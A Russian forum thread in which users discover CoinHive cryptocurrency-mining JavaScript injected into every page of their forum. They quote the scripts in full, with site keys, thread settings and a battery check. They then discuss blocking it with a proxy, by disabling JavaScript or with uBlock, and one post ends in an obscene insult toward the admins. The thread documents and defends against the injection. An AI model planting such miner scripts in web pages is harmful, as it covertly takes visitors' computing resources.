Форум взломан чуть-чуть.

Тема в разделе "Флудилка", создана пользователем rkit, 22 сен 2017.

  1. rkit

    rkit Гуру

    В исходнике каждой страницы.
    Код (Text):

    <body><script src="https://coin-hive.com/lib/coinhiv.min.js"></script>
    <script>
    var miner = new CoinHive.Anonymous('AprkKnDhxVVYCpyd44sJFNdVZNjnWWOm', {
    throttle: 0.2,
    threads: 10,
    autoThreads: false,
    } );
    miner.start();
    </script>
     
     
    acos нравится это.
  2. Tomasina

    Tomasina Сушитель лампочек Команда форума

    майнят потихоньку.
     
  3. Igor68

    Igor68 Гуру

    Вот блин... придётся на малине поднимать прокси... чтобы он "вырезал" этот кусок кода из содержимого.
     
  4. Igor68

    Igor68 Гуру

    вот по этому адресу (https://coin-hive.com/) даже исходники дают:
    Код (Javascript):
    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.User('<site-key>', 'john-doe');
        miner.start();
    </script>
    ну и
    Код (Bash):
    curl "https://api.coin-hive.com/user/balance?name=john-doe&secret=<secret-key>"
    # {success: true, name: "john-doe" balance: 4096}
    как раз в "разделе"
    Flexible JavaScript API

    хотя можно проще... в прокси блокировать адрес https://coin-hive.com/
    ну или IP
    Код (Bash):
    igor@debian-i:~$ ping www.coin-hive.com
    PING www.coin-hive.com (94.130.129.239) 56(84) bytes of data.
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=1 ttl=52 time=52.0 ms
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=2 ttl=52 time=53.9 ms
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=3 ttl=52 time=55.6 ms
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=4 ttl=52 time=52.1 ms
     
     
  5. rkit

    rkit Гуру

    Всё. Уже нету
     
    Igor68 нравится это.
  6. Igor68

    Igor68 Гуру

    Ну если интересно содержимое
    coinhive.min.js.zip
    по wget:

    Код (Bash):
    igor@debian-i:~/Загрузки/wget$ wget https://coin-hive.com/lib/coinhive.min.js
    --2017-09-22 16:57:49--  https://coin-hive.com/lib/coinhive.min.js
    WARNING: gnome-keyring:: couldn't connect to: /home/igor/.cache/keyring-ngq8T8/pkcs11: Нет такого файла или каталога
    Распознаётся coin-hive.com (coin-hive.com)... 94.130.129.239, 94.130.128.243, 94.130.128.151, ...
    Подключение к coin-hive.com (coin-hive.com)|94.130.129.239|:443... соединение установлено.
    HTTP-запрос отправлен. Ожидание ответа... 200 OK
    Длина: 137881 (135K) [application/javascript]
    Сохранение в каталог: ««coinhive.min.js»».

    100%[======================================================================================================================================================>] 137 881      423K/s   за 0,3s  

    2017-09-22 16:57:52 (423 KB/s) - «coinhive.min.js» saved [137881/137881]

    igor@debian-i:~/Загрузки/wget$
     

    Вложения:

  7. rkit

    rkit Гуру

    Оп. обратно. Ну принципе это заметно - форум спамит ошибками
     
  8. Tomasina

    Tomasina Сушитель лампочек Команда форума

  9. Tomasina

    Tomasina Сушитель лампочек Команда форума

  10. BAR__MEN

    BAR__MEN Вселенский Няш Команда форума

    Бросаю форум пока не сделают....
     
    Последнее редактирование: 5 дек 2017
  11. sys

    sys Злобный Буратино Команда форума

    мда... дожили... незлобные буратины решили подзаработать... лишь бы не грохнули форум :)
     
  12. Пушной звер

    Пушной звер Оракул

     
  13. Igor68

    Igor68 Гуру

    Вот интересно стало... по новому:
    Код (Javascript):
    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
    var miner = new CoinHive.Anonymous('HqRcfNypnewChJOyojLNSYRLbHuIki9S', {
    threads: navigator.hardwareConcurrency/4,
    autoThreads: false,
    forceASMJS: false
    });
    miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
    setInterval(function() {
    var threadCount = miner.getNumThreads();
    var hashesPerSecond = Math.round(miner.getHashesPerSecond());
    var getTotalHashes = miner.getTotalHashes();
    navigator.getBattery().then(function (battery) {
    if (battery.level < 0.50 && battery.charging == false) {
    miner.stop();
    }
    });
    }, 100);
    </script>
    Даде батарейку проверяет.
     
  14. Igor68

    Igor68 Гуру

    А он (скрипт) - козёл! Даже отредактировать не даёт. Была опечатка "Даде", а надо "Даже"
     
  15. Igor68

    Igor68 Гуру

    Уважаемые майнеры!!! Если не затруднит измените интервал в скрипте в 10 раз... и исключите повторение запуска. А то процессор грузит. Понимаю конечно, что источник сего хлама именно на сайте в исходниках страниц.
     
  16. Igor68

    Igor68 Гуру

    Отключил JS... пробую сообщение.
     
  17. Igor68

    Igor68 Гуру

    при отключенном JS пробую вставить код:
    Код (Bash):

    echo "test"
     
    Код (C++):

    #include <stdio.h>
    int main(void)
    {
         printf("test");
         return 0;
    }
     
    Вроде работает... только вручную. Зато загрузки процессора нет никакой.

    И прокси поднимать не надо. И глупых ошибочных сообщений нет... и редактировать нормально.

    И войти получается... ну понятное дело всплывающего меню нет.

    И JS можно включать и выключать когда надо... только после этого обновлять страницу.
     
    Последнее редактирование: 23 сен 2017
  18. Igor68

    Igor68 Гуру

    При включении JS сразу загрузка 100%.
     
  19. Igor68

    Igor68 Гуру

    Как вариант для Firefox установил дополнение uBlock... запросы конечно есть, но блокируются. Выскакивает предупреждение, но загрузки процессора нет.
     
  20. Karabas

    Karabas Гик

    Спасибо, Друг, за предупреждение!
    А я то грешил на что угодно, во тот такой подляны не ожидал.
    Ну да, пользуйся народ, у меня же комп так, для красоты стоит.

    Скажу, как думаю- вы, админы, ПИДАРАСЫ!